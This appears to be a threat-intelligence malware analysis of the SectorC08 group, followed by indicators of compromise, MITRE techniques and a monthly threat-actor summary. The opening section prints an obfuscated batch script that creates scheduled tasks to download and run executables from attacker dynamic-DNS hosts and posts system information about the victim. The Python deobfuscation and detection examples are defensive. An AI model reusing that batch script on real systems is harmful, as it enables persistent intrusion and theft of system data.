schtasks /Create /SC MINUTE /MO 30 /F /tn %BDwSMJD%_%KsEEKky:-=%_01 /tr "%cjhIZDS%\%BDwSMJD%.exe -b -c -t 5 '%eNSzFCv%://%flkpgez%.%HIngDXg%/%NFJOtqt%/%NOdKmih%.exe' -P '%USERPROFILE%'"
set SbTrL=%SgJyn%*whAWq-%atpVW%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
schtasks /Create /SC MINUTE /MO 32 /F /tn %BDwSMJD%_%KsEEKky:-=%_02 /tr "%USERPROFILE%\%NOdKmih%.exe"
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
if defined BtRtCGM ( schtasks /Create /SC MINUTE /MO 31 /F /tn %BDwSMJD%_%KsEEKky:-=%_03 /tr "%cjhIZDS%\%BDwSMJD%.exe -e http_proxy=http://%BtRtCGM% --proxy-user=%tBUCICm% --proxy-password=%BwtKgWA% -b -c -t 3 '%eNSzFCv%://%flkpgez%.%HIngDXg%/%NFJOtqt%/%NOdKmih%.exe' -P '%USERPROFILE%'" )
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
:KTmZDZR
set SbTrL=%SgJyn%*whAWq-%atpVW%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set /a xTBHxRg=39*%RANDOM%/32768
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
ping -n 10 127.0.0.1
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
timeout /t %xTBHxRg%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
taskkill /f /im %ViKDbBD%.exe
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
set SbTrL=%SgJyn%*whAWq-%atpVW%
%ViKDbBD%.exe --user-agent=%per_23% --post-data="versiya=%EbnMNIJ: =%&comp=%per_24%&id=%NFJOtqt: =%&sysinfo=%CHeqCJB%" "%EhFWXVK%" -q -N %EhFWXVK% -O %GLUymyw%.exe
set SbTrL=%SgJyn%*whAWq-%atpVW%
if defined BtRtCGM ( %ViKDbBD%.exe --user-agent=%per_23% -e http_proxy=http://%BtRtCGM% --proxy-user=%tBUCICm% --proxy-password=%BwtKgWA% --post-data="versiya=%EbnMNIJ: =%&comp=%per_24%&id=%NFJOtqt: =%&sysinfo=%CHeqCJB%" "%EhFWXVK%" -q -N %EhFWXVK% -O %GLUymyw%.exe )
ping -n 5 127.0.0.1
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set /a zDGBFmh=0
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
for %%o in (%GLUymyw%.exe) do (set /a zDGBFmh=%%~Zo)
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
if %zDGBFmh% GEQ 50002 call :FdLHKss
set SbTrL=%SgJyn%*whAWq-%atpVW%
set /a xTBHxRg=30*%RANDOM%/32768
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
ping -n 5 microsoft.com
set SbTrL=%SgJyn%*whAWq-%atpVW%
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
goto KTmZDZR
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
:FdLHKss
start "" "%GLUymyw%.exe"
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
ping -n 11 google.com.ua
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
del /q /f "%GLUymyw%.exe"
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
exit /b
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%

From the script above, we can see that MicrosoftCreate.exe (a renamed wget) is copied to "%APPDATA%\Microsoft\IE\weristotal.exe". One scheduled task then runs weristotal.exe every 30 minutes to download an EXE from hxxp://bitvers[.]ddns[.]net/<computerinfo>/winusers.exe into %USERPROFILE%, a second task runs the downloaded winusers.exe every 32 minutes, and if a proxy is configured a third task (every 31 minutes) repeats the download through the proxy. The repetition matters because SectorC08's servers very often return an HTTP 403 Forbidden error instead of the requested file.

Separately, the original MicrosoftCreate.exe also runs in a loop, posting to hxxp://wincreator[.]ddns[.]net and saving the response as another executable, jasfix.exe in this case. The downloaded file is started (label :FdLHKss) only if it is at least 50002 bytes, which keeps a short error page from being executed, and the loop then repeats after random delays. The two wget downloads use different DDNS hostnames, but both hostnames pointed to the same IP addresses, so this is also a form of redundancy for SectorC08.

To identify victims, the fields sent in the wget POST include "versiya" (the version code), "comp" (the %computername% environment variable), "id" (%computername% joined to the C: volume serial number taken from "vol c:", hyphens removed) and "sysinfo" (the entire output of the systeminfo command, lines joined with "+###"). All of this is sent in the clear over HTTP.
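As an added example (not code from the original report), the following Python script shows one way to recover the real commands from this style of batch obfuscation: junk "set"/"if ... set" statements are identified as dead stores (assignments to variables that never reach a command line, directly or through other "set" lines), and the surviving %VAR% and %VAR:old=new% expansions are resolved top-down in the order cmd.exe would evaluate them. The input is a constructed excerpt in the style of 11009.cmd above, reusing its variable names; the values supplied for %computername% and the volume serial (KsEEKky) are assumptions for the run, and the function names are the example's own.

```python
"""Dead-store stripping and %VAR% resolution for SectorC08-style batch scripts.

Added example, not code from the original report. SAMPLE is a constructed
excerpt in the style of 11009.cmd that reuses its variable names.
"""
import re

SAMPLE = r'''
@echo off
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
chcp 1251>NUL
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set "qwoMlMx=HKCU\Software"
set SbTrL=%SgJyn%*whAWq-%atpVW%
set "CnGKehh=Microsoft\Windows"
set "XCEEJVi=CurrentVersion\Internet Settings"
set GMXXMeP="%qwoMlMx%\%CnGKehh%\%XCEEJVi%"
if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn
For /F "UseBackQ Tokens=2*" %%n In (`Reg.exe Query %GMXXMeP%^|Find /I "ProxyServer"`) do set BtRtCGM=%%o
For /F "skip=1 Tokens=4*" %%u In ('vol c:') Do set KsEEKky=%%u
set EbnMNIJ=22.05
set per_24=%computername%
set NFJOtqt=%computername%_%KsEEKky:-=%
set eNSzFCv=http
set FbNZKeg=wincreator
set HIngDXg=ddns.net
set EhFWXVK=%eNSzFCv%://%FbNZKeg%.%HIngDXg%
set GLUymyw=jasfix
set "cjhIZDS=%APPDATA%\Microsoft\IE"
set ViKDbBD=MicrosoftCreate
set BDwSMJD=weristotal
set NOdKmih=winusers
set flkpgez=bitvers
set per_23="Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64"
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
copy "%ViKDbBD%.exe" "%cjhIZDS%\%BDwSMJD%.exe" /y
schtasks /Create /SC MINUTE /MO 30 /F /tn %BDwSMJD%_%KsEEKky:-=%_01 /tr "%cjhIZDS%\%BDwSMJD%.exe -b -c -t 5 '%eNSzFCv%://%flkpgez%.%HIngDXg%/%NFJOtqt%/%NOdKmih%.exe' -P '%USERPROFILE%'"
%ViKDbBD%.exe --user-agent=%per_23% --post-data="versiya=%EbnMNIJ: =%&comp=%per_24%&id=%NFJOtqt: =%" "%EhFWXVK%" -q -N %EhFWXVK% -O %GLUymyw%.exe
'''

# `set NAME=value` / `set "NAME=value"` (cmd variable names are case-insensitive)
SET_RE = re.compile(r'^set\s+(?:/a\s+)?("?)([A-Za-z_]\w*)=(.*)$', re.I)
# `if <anything> set NAME=...` as used for the junk statements
IF_SET_RE = re.compile(r'^if\s+.+?\s+set\s+"?([A-Za-z_]\w*)=', re.I)
# %NAME% or %NAME:old=new% (cmd's substring-replacement expansion)
EXPAND_RE = re.compile(r'%([A-Za-z_]\w*)(?::([^%=]*)=([^%]*))?%')
URL_RE = re.compile(r"https?://[^\s'\"]+")


def parse_set(line):
    """(lower-cased name, raw value) for a plain `set` line, else None."""
    m = SET_RE.match(line)
    if not m:
        return None
    quoted, name, value = m.groups()
    if quoted and value.endswith('"'):      # set "NAME=value" form
        value = value[:-1]
    return name.lower(), value


def assigned_name(line):
    """Variable assigned by a `set` or `if ... set` line, else None."""
    s = parse_set(line)
    if s:
        return s[0]
    m = IF_SET_RE.match(line)
    return m.group(1).lower() if m else None


def live_variables(lines):
    """Names that feed a real command, directly or via other `set` lines."""
    live = set()
    for line in lines:
        if assigned_name(line) is None:     # a command, not an assignment
            live.update(m.group(1).lower() for m in EXPAND_RE.finditer(line))
    changed = True
    while changed:                          # propagate backwards through set chains
        changed = False
        for line in lines:
            s = parse_set(line)
            if s and s[0] in live:
                for m in EXPAND_RE.finditer(s[1]):
                    if m.group(1).lower() not in live:
                        live.add(m.group(1).lower())
                        changed = True
    return live


def expand(text, env):
    """Expand %VAR% / %VAR:old=new% from env; unknown names are left as-is."""
    def sub(m):
        name, old, new = m.group(1).lower(), m.group(2), m.group(3)
        if name not in env:
            return m.group(0)
        return env[name].replace(old, new) if old else env[name]
    return EXPAND_RE.sub(sub, text)


def deobfuscate(script, env=None):
    """Return (resolved command lines, final variable environment)."""
    env = {k.lower(): v for k, v in (env or {}).items()}
    lines = [l.strip() for l in script.splitlines() if l.strip()]
    live = live_variables(lines)
    commands = []
    for line in lines:
        name = assigned_name(line)
        if name is not None and name not in live:
            continue                        # dead store: junk inserted for obfuscation
        s = parse_set(line)
        if s:                               # cmd expands %VAR% when the set executes
            env[s[0]] = expand(s[1], env)
            continue
        commands.append(expand(line, env))
    return commands, env


def download_urls(commands):
    """URLs that survive resolution, in order of first appearance."""
    seen = []
    for c in commands:
        for u in URL_RE.findall(c):
            if u not in seen:
                seen.append(u)
    return seen


if __name__ == "__main__":
    # Assumed runtime values for the two names the script reads from the host.
    cmds, env = deobfuscate(SAMPLE, {"computername": "WKS01", "KsEEKky": "1A2B-3C4D"})
    print("\n".join(cmds))
    print("version code:", env["ebnmnij"], "| URLs:", download_urls(cmds))
```

The liveness pass is what makes this robust to the junk: the SgJyn/GEdaT/SbTrL/whAWq/atpVW/xGAmD statements reference only each other, so none of them ever reaches a command line and all are dropped, while the real chain (eNSzFCv + FbNZKeg + HIngDXg into EhFWXVK, for example) is kept because the wget line expands it.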

Another area to note is the user-agent used and the "versiya" (version) field in the post-data. The user-agent is left as wget's default about half the time; at other times various and even unusual user-agent strings are used, which suggests that SectorC08 sometimes knows which user-agent strings are used, or likely to be used, in the victim environment.

Version code   User-Agent
07.05          Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36
13.05          Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
13.05          Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) Safari/604.1
21.05          Mozilla/5.0 (Linux; Android 5.1; Neffos C5 Build/LMY47D) Mobile Safari/537.36
21.05          Mozilla/5.0 (X11; Linux x86_64) Safari/537.36
23.05          Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
23.05          Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64
24.05          Mozilla/5.0 (Linux; Android 8.0.0; SM-G955F Build/R16NW) Safari/537.36
24.05          Mozilla/5.0 (Windows NT 5.1) Chrome/49.0.2623.112
U_04           Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
USB_04         Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
USB_07         Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
USB_08         Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
%1_401         Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64
osb            Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36

Additionally, if a proxy is defined under "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" through the registry values "ProxyServer", "ProxyUser" and "ProxyPass", those values are passed to wget as the "http_proxy" setting and the "--proxy-user" and "--proxy-password" options in a second invocation of wget.

In total we observed six different wget binaries in recent SectorC08 use, which appear to be variants of GNU Wget 1.11.4 and GNU Wget 1.16.
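The download and persistence chain above leaves a small set of observable artifacts: an SFX launched from the profile root with a "-p<password>" argument, a minute-interval scheduled task whose action carries wget's background/continue/tries flags ("-b -c -t N") and a URL, and a cleartext POST carrying the "versiya", "comp", "id" and "sysinfo" fields, often with wget's default "Wget/<version>" user-agent. As an added example (not the report's own tooling), the Python below encodes those observations as rules and runs them over a few constructed telemetry records; the record field names (image, cmdline, method, host, user_agent, body) and the dynamic-DNS suffix list are assumptions of this example.

```python
"""Detection rules for the SectorC08 download/persistence chain, run over
constructed telemetry records. Added example; not code from the original report.
Field names (image, cmdline, method, host, user_agent, body) are assumptions."""
import re

# Constructed records modelled on the behaviour described in the report (not real logs).
CONSTRUCTED_EVENTS = [
    ("process", {"image": "C:\\Users\\victim\\winver.exe",
                 "cmdline": "\"C:\\Users\\victim\\winver.exe\" -puyjqystgblfhs"}),
    ("process", {"image": "C:\\Windows\\System32\\schtasks.exe",
                 "cmdline": "schtasks /Create /SC MINUTE /MO 30 /F /tn weristotal_1A2B3C4D_01 "
                            "/tr \"C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\IE\\weristotal.exe "
                            "-b -c -t 5 'http://bitvers.ddns.net/WKS01_1A2B3C4D/winusers.exe' "
                            "-P 'C:\\Users\\victim'\""}),
    ("http", {"method": "POST", "host": "wincreator.ddns.net", "user_agent": "Wget/1.11.4",
              "body": "versiya=22.05&comp=WKS01&id=WKS01_1A2B3C4D&sysinfo=Host Name:+WKS01+###"}),
    ("process", {"image": "C:\\Windows\\System32\\notepad.exe",
                 "cmdline": "notepad.exe C:\\Users\\victim\\notes.txt"}),
    ("http", {"method": "GET", "host": "www.example.com",
              "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36", "body": ""}),
]

# Dynamic-DNS suffixes taken from the report's indicator list (assumed complete enough here).
DYNDNS_SUFFIXES = (".ddns.net", ".myftp.org")


def sfx_password_from_profile(t, d):
    """Executable run straight from the user's profile root with an SFX -p<password> argument."""
    return t == "process" and re.search(
        r'^"?[A-Za-z]:\\Users\\[^\\]+\\[^\\ ]+\.exe"?\s+-p\S+$', d["cmdline"], re.I) is not None


def minute_task_with_wget_flags(t, d):
    """schtasks creating a minute-interval task whose action has wget-style -b -c -t N and a URL."""
    c = d.get("cmdline", "")
    return (t == "process" and d["image"].lower().endswith("schtasks.exe")
            and re.search(r"/SC\s+MINUTE", c, re.I) is not None
            and re.search(r"\s-b\s+-c\s+-t\s+\d", c) is not None
            and re.search(r"https?://", c, re.I) is not None)


def wget_post_beacon(t, d):
    """Cleartext POST carrying the versiya/comp/id/sysinfo victim-identification fields."""
    return t == "http" and d["method"] == "POST" and all(
        k in d["body"] for k in ("versiya=", "comp=", "id=", "sysinfo="))


def default_wget_user_agent(t, d):
    """GNU Wget's default User-Agent is 'Wget/<version>'."""
    return t == "http" and d["user_agent"].startswith("Wget/")


def dynamic_dns_host(t, d):
    """HTTP traffic to a dynamic-DNS hostname; weak alone, useful in combination."""
    return t == "http" and d["host"].lower().endswith(DYNDNS_SUFFIXES)


RULES = [sfx_password_from_profile, minute_task_with_wget_flags, wget_post_beacon,
         default_wget_user_agent, dynamic_dns_host]


def run_rules(events):
    """Return [(rule_name, event_index), ...] for every rule that fires."""
    hits = []
    for i, (t, d) in enumerate(events):
        for rule in RULES:
            if rule(t, d):
                hits.append((rule.__name__, i))
    return hits


def score(events):
    """Distinct rules fired per event index; events with no hits are omitted."""
    counts = {}
    for _, i in run_rules(events):
        counts[i] = counts.get(i, 0) + 1
    return counts


if __name__ == "__main__":
    for name, i in run_rules(CONSTRUCTED_EVENTS):
        print(f"event {i}: {name}")
    print(score(CONSTRUCTED_EVENTS))
```

The dynamic-DNS and default user-agent rules are deliberately weak on their own (legitimate software uses both); the value is in the combination with the POST field names, which are specific to this chain, and with the minute-interval task pattern.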

Stage 3 and 4 – UltraVNC

The file downloaded by wget is the stage 3 binary: another 7zSFX archive, this time containing a password-protected WinRARSFX archive that deploys UltraVNC for remote administration. Using UltraVNC for unauthorized remote administration is a tactic SectorC08 has employed for many years.

Summary

SectorC08 is a threat group that has targeted Ukraine for many years. That their tactics have changed little in that time suggests they have achieved at least some success in their operations. From a technical standpoint their custom malware may look unsophisticated, since these samples are not technically difficult to create, but through creative use of various versions of open-source utilities and by varying static details such as the 7zSFX and WinRARSFX versions used to build their executables and even the icon of every file, they have consistently achieved low detection rates from security products and are likely to continue to do so.

Indicators of Compromise

Hashes (SHA-256)

26810e37b605df1a444dc9468d79d8ead28e134a9541ee67241eb50924e4236e
a3fbc94375920390db0d53e2dd59e7606042e047e017125904de6965a502b2f0
b6addc4567145df117d14cfbe6edac98676af16ac5a2da77fb9da31734e3a50e
cab1a3ede5f8b222f402896b2acc315568ee35b8bed02b4d9172cbe75a206e4e
3399e9e57052410411bade73176cea11479a46a7adf866b615a6f369f3e8e9d2
374fd24a31894d9090e46f7bd25cfe5192981e4df45ef7a9be128e37a9e11dde
8c6673f5081bf1389bd5adb88453d86900e17aaa4b9887aa7eb1fd02bbe89dca
9034b7fd62f9d655c7bbbee19f33e9d334fe57849ca938f3293cdb41647e0e89
3c464eb893b719c35064a5ed60f9a204e231b3f5e960782893e4a5f1124aff3b
5dae4d7bbff9ebe9f4032c009f233633baa79061efd7a9e3deaf2c0bc18ac742
020c268089ff2590d27349d0ba9e748269e3afa40127f7acb9d44fcc31a0c30f
73eae0ddc00d228c49ee6aa3369603fb153b56264b8092dd175c2fb49646af39
a7cb50745886f2535d7eefde299cdaa2f64df44163c09a779c9f859bc6304d87
958a9876b158c4ef96556535a2822b2a5193259c4a71086c5ed003c8e5109b63
2709dc808c0fbf6d4990466e44b15f9aa2c94569a137dbb83a95fc8e1beefb89
55cdfe068487a8ca2c1bbfe852f27c9f0d1918d6d5182f28456a5af361511ce3
3bbedec42b4fb9ee2624b36ebb9214d41405a399df86a9332e5cc45cf399201c
be41c927eb7445e759027b84a87426643d39f6287320ef085889b8367e311bfd
a800af4fb370c0afb58c4a300e4fcd7f25439d3379bdf82687a1e86848209799
5555a3292bc6b6e7cb61bc8748b21c475b560635d8b0cc9686b319736c1d828e
1fa39419ea9c2e46acc1f84a6513ae05db8b66cf2fad419962c86ec32f63b5af
c298f905949799fd52c162f35bea112bddc9fa2f921a47f346818d95f71a5c2e
9d51ff330c2772458a8597252b9d13af4ff41e277a942a978070cb8280621760
151ddd68312859bb7b13d3486b95f2f48a4cc7eea3d4f4f4ffc643f2fd34eed6
78daa3f1af5489ee9926752a92e024e2ba18587e53463d81676598d5ccdc3b24
abe17d0cefbbfd24a8df1607ff30628960a4bc5baf035c9d07e15628727523d3
cbbd69de64be85fe1a0d63acde5bf735bd424a57c25893036bb2a16fc99cec2c
a8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c
9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf
fc3a1af59e1ff1d1d4fe38976900708e2003d40e065b075e517cd483d440fe57
1c139173ea4b615a09d27070443f6b601d8571d02fd5445cfec2ce690c276da1
09c527ed64ac87b9dfce00e6ed5562d1fc508bfb018eac493cf0c02558c7a840
d55cb155a97c7c8dfea78b54fa6a5b0a8952068a87357fac221fbe6e70d7a1ea
cadb3faa4953c3e9f0f2a5204373b20a2984ee371b9d230717dbfa67e84eb9c4
14212c4cc251bb1876a01b6fbcc68eb7d0f8e754cac66b417aa0589229471f14
31d8d4e95d2d932c3a9cfc8aea15f8fc464290202f8d681f1e63b93cbf057c1a
548b0ef8da5ec586fb47e56c852e4f7b3f3c424ed9deabc91416bdf996885820
cd59b18c84e79c5fcf5a93600e06493d84c9766985ed7cfab3b9478a4c30472e
39629483da85cb8bf8a32e83f54a6a89320fc9e574d657f0636207d1eb669f38
2a1efabb5a1eb219ae9232a28c9e37d176dd98866c93509f11733dd9e8fce97b
449dd5126d51d51b1f0f6bebea52b36c9aa196f2f2cbd6e677013e26bd832ffb
22821897a44e2db6a816f54a21e34aa59234baf2d3ae54d9ecaadd0ceceffa74
d708c90d51efd1a7b6bc5142b6736bd90454d943d9d6e1860cd6395918ff9ad0
14e814c9cb2e0a03055163625b3099706bd92b95141831acb9150cfba1403bfa
9f697822a3d4714d3b0732aead3c0b2ba14c99f183d06b0694c98a5578cc08c4
601d85c0236f8d3a82fecf353adb106fac23f1681ef866783ff6e634538c9ce0
ba2b5092d1fb79698b6f25c4a435632887164672bd355add2c7e7ffce9a45d72
d3ad9b3b0b6cee60c828c847c9ebd9f7cd5e6b6b5ef31b368b16437e48f7204f
80301273fa0189a57514611a17fe79809a5c1eb044000399b7fce9a73379a9b9
6ffee0a44eaf37c8f00e16e18484bebbf4cad32c9b65b7e1329284d92ca0ff5e
6e524e4caa5975f391219dfe5bf03c63e9b248036b264efb7f3f37f4652348b3
ddcb6a9f5cb1789615985314c58d21f43140e3d53b95b92ffe7e097143cc7763
80e876d46ddfb5348d9b8ea6fbb907d6c1029da3854dd3366ab4891c4967b305
72bbbee65e033826b95f4e6fdea6ca124f00f007f7fb080c7568a523523c4111
362b3b172c95bd9d0b04bec3878460d379e2a47e90e23ae54e5d7f991a1ea69c
034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185d40821
dd1cdb0ecd48dfc9b7d500414bfc8b07b1babcbb7f8a77eb83a369dabfe8bf93
1093b834938d7547181a14832c3caa95211c75af987f01745cd319e2e5144dfd
9d89ac5d55568d4b37e86c52e8adae57cfe643d134858f4f1404c2e1432976df
b74e88a130823bfb3fae18bc8b8c9eb2553598cb215b2559f436aa3f0875dc64


wget utilities (SHA-256)

92CCC276806C98C4A163855ED6532395438435DB433ECF02A04A9295F6703492
F5BDE8107EC70097D786896F4AA16B96B597DBF0936F61C7856D4C686AA69B54
A48AD33695A44DE887BBA8F2F3174FD8FB01A46A19E3EC9078B0118647CCF599
68452CEDF3D911013B416FE13744D59B5BD15044D9DF13178FF117EA0E05C44F
888BA9147BA89B5713AFE031449BE46BB20972F68839BC3546A511109A496197
8B50E3CA06A22D0BE6A71232B320137C776F80AC3F2C81B7440B43854B8A3BF0

Embedded Lure Documents

67FF9031CE8931FCB4E2AE0E72D1D3B8A67EA39257BB7759DCEA925757A85DD8
4A1B730A2AF2A498D452625CB952297630956B2236AE381051E91C53477E9C2D
606C3D0AE26F6D0C17724409FBDB6960FE246FBF63B3564B06507A68BE6D2F31
B511E05100B3A4F3515C5526D2DC3C873F66384225C174C65931744D9E682DC0
F7E74C7FBA99E1F500A37145ADBDE8F62E3811D50E85330EBFE8B13F1C4B90CF
73E3732EB46A05C1D5E4ED57F222B195C4C3AF4A2E5B9F2FBA37762F79BAF222

Domain Names

hxxp://wincreator[.]ddns[.]net
hxxp://bitwork[.]ddns[.]net
hxxp://winrouts[.]ddns[.]net
hxxp://widusk[.]ddns[.]net
hxxp://workusb[.]ddns[.]net
hxxp://torrent-videos[.]ddns[.]net
hxxp://sprs-files[.]ddns[.]net
hxxp://sprs-updates[.]ddns[.]net
hxxp://spread-new[.]ddns[.]net
hxxp://drop-new[.]ddns[.]net
hxxp://telo-spread[.]ddns[.]net
hxxp://dropdrop[.]ddns[.]net
hxxp://bitvers[.]ddns[.]net
hxxp://my-certificates[.]ddns[.]net
hxxp://kristousb[.]ddns[.]net
hxxp://my-work[.]ddns[.]net
hxxp://spr-d2[.]ddns[.]net
hxxp://military-ua[.]ddns[.]net
hxxp://bitlocker[.]ddns[.]net
hxxp://const-gov[.]ddns[.]net
hxxp://tor-file[.]ddns[.]net
hxxp://torrent-vnc[.]ddns[.]net
hxxp://versiya-spread[.]myftp[.]org
hxxp://spread[.]crimea[.]com
hxxp://dropper[.]crimea[.]com
hxxp://torrent-stel[.]space
hxxp://torrent-supd[.]space

IP Addresses

5[.]23[.]55[.]212
80[.]211[.]167[.]231
84[.]78[.]25[.]153
91[.]226[.]81[.]235
94[.]154[.]11[.]23
95[.]142[.]45[.]48
142[.]93[.]110[.]250
185[.]158[.]115[.]137
185[.]158[.]114[.]95
185[.]231[.]154[.]122
185[.]231[.]154[.]154
185[.]231[.]155[.]12
185[.]231[.]155[.]69
185[.]231[.]155[.]209
185[.]248[.]100[.]104
185[.]248[.]100[.]121
185[.]248[.]100[.]142
193[.]19[.]118[.]65
193[.]19[.]118[.]238
195[.]2[.]253[.]218
195[.]62[.]52[.]91
195[.]62[.]52[.]119
195[.]62[.]52[.]160
195[.]62[.]52[.]164
195[.]62[.]53[.]158
195[.]88[.]208[.]26
195[.]88[.]208[.]51
195[.]88[.]208[.]133
195[.]88[.]208[.]157
195[.]88[.]209[.]136

MITRE ATT&CK Techniques

The following MITRE ATT&CK techniques were observed in our analysis of this malware.

Initial Access

T1091 Replication Through Removable Media
T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1085 Rundll32
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution
T1047 Windows Management Instrumentation

Persistence

T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task
T1023 Shortcut Modification

Defense Evasion

T1158 Hidden Files and Directories
T1036 Masquerading
T1085 Rundll32
T1064 Scripting
T1027 Obfuscated Files or Information

Discovery

T1057 Process Discovery
T1012 Query Registry
T1082 System Information Discovery
T1016 System Network Configuration Discovery
T1124 System Time Discovery
T1497 Virtualization/Sandbox Evasion

Command and Control

T1043 Commonly Used Port
T1065 Uncommonly Used Port
T1219 Remote Access Tools
T1071 Standard Application Layer Protocol

Monthly Threat Actor Group Intelligence Report, April 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from March 21 to April 20, 2019.


1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA05 and SectorA06 were found among SectorA hacking groups this April.

The scope of activity for SectorA groups found in April is much larger than in the past. Previously, their targets were mainly in East Asia and North America, but now they include many more targets around the world. Traces of hacking activity have been found in the Middle East, including Israel, Turkey and Palestine; East Asia, including China and South Korea; Eastern Europe, including Ukraine and Slovenia; South and Southeast Asia, including Sri Lanka and Vietnam; and North America, including the United States.

The techniques used were basically spear phishing with a Hangul Word Processor (HWP) file or a Microsoft Word file, depending on the target person or organization. We also observed them using the recently discovered WinRAR vulnerability. In addition, a watering hole attack was found.

For targets in East Asia, including South Korea, their aim was stealing information related to politics and diplomacy, as well as financial information, notably virtual currencies. Elsewhere, they sought military information related to weapons and diplomatic information from countries engaged in diplomatic activities related to SectorA.

Since SectorA groups are conducting these activities to steal military, diplomatic, political and financial information, the scope of their hacking is expected to keep expanding.


2. SectorB Activity Features

A total of three hacking groups, SectorB01, SectorB06, and SectorB10 were found among SectorB hacking groups this April.

SectorB group activity has been found in Europe, including Russia, Portugal, Germany and France, and in Asia, including Mongolia, Singapore, Japan, Taiwan, Vietnam and South Korea.

SectorB groups hacked the internal networks of hardware and software manufacturers in East Asia using malicious Microsoft RTF files as spear phishing attachments, exploiting vulnerabilities that have been used frequently in the past.

These Supply Chain Attacks were linked to cases involving malware in an online game update file developed by an online gaming company in East Asia in March.

They likely did so because directly hacking their target organizations or staff was difficult enough to warrant other routes, such as a supply chain attack, to gain access to their targets.


3. SectorC Activity Features

A total of three hacking groups, SectorC01, SectorC02, and SectorC10 were found among SectorC hacking groups this April, with hacking activity targeted at countries in Europe and North America, including Britain, the United States, and Germany.

This April, SectorC groups aimed at stealing information on political and diplomatic activities in European countries. They mainly used spear phishing with malware, and targeted the presidential elections in certain Eastern European countries.

In addition, SectorC10 activity targeting ICS/SCADA environments was discovered; this group has a variety of capabilities and tools, such as web shells and backdoors, and performs credential harvesting and remote command execution.


4. SectorD Activity Features

A total of four hacking groups, SectorD01, SectorD02, SectorD05 and SectorD12, were found among SectorD hacking groups this April. Their activity targeted countries in the Middle East, including the Sector's political competitors Saudi Arabia, the United Arab Emirates, Jordan, Iraq and Turkey, as well as Ukraine, Estonia, Germany, the United States, and countries in South and East Asia.

SectorD groups mainly use spear phishing with malware; example phishing documents were Word files using confidential U.S. State Department forms. Malware in the form of compressed files abusing the recently discovered WinRAR vulnerability was also found. SectorD groups mainly collected political, military and diplomatic information from countries in the Middle East that are their political competitors.

With the recent declaration of non-compliance with some terms of the nuclear agreement to which it is a party, hacking aimed at collecting information on other governments' activities is expected to intensify, as conflicts with other countries are expected in many areas, including politics and diplomacy.


5. SectorE Activity Features

A total of two hacking groups, SectorE02, and SectorE05 were found among SectorE hacking groups this April, with hacking activity targeted at countries including Pakistan, Bangladesh, Sri Lanka, Myanmar and Nepal.

SectorE groups typically use spear phishing as their main technique, attaching web page links or Microsoft Excel documents containing VBA macro scripts to emails that mimic legitimate entities such as foreign governments, telecommunications companies and the defense industry, or using malicious Microsoft Word files that exploit known code execution vulnerabilities.

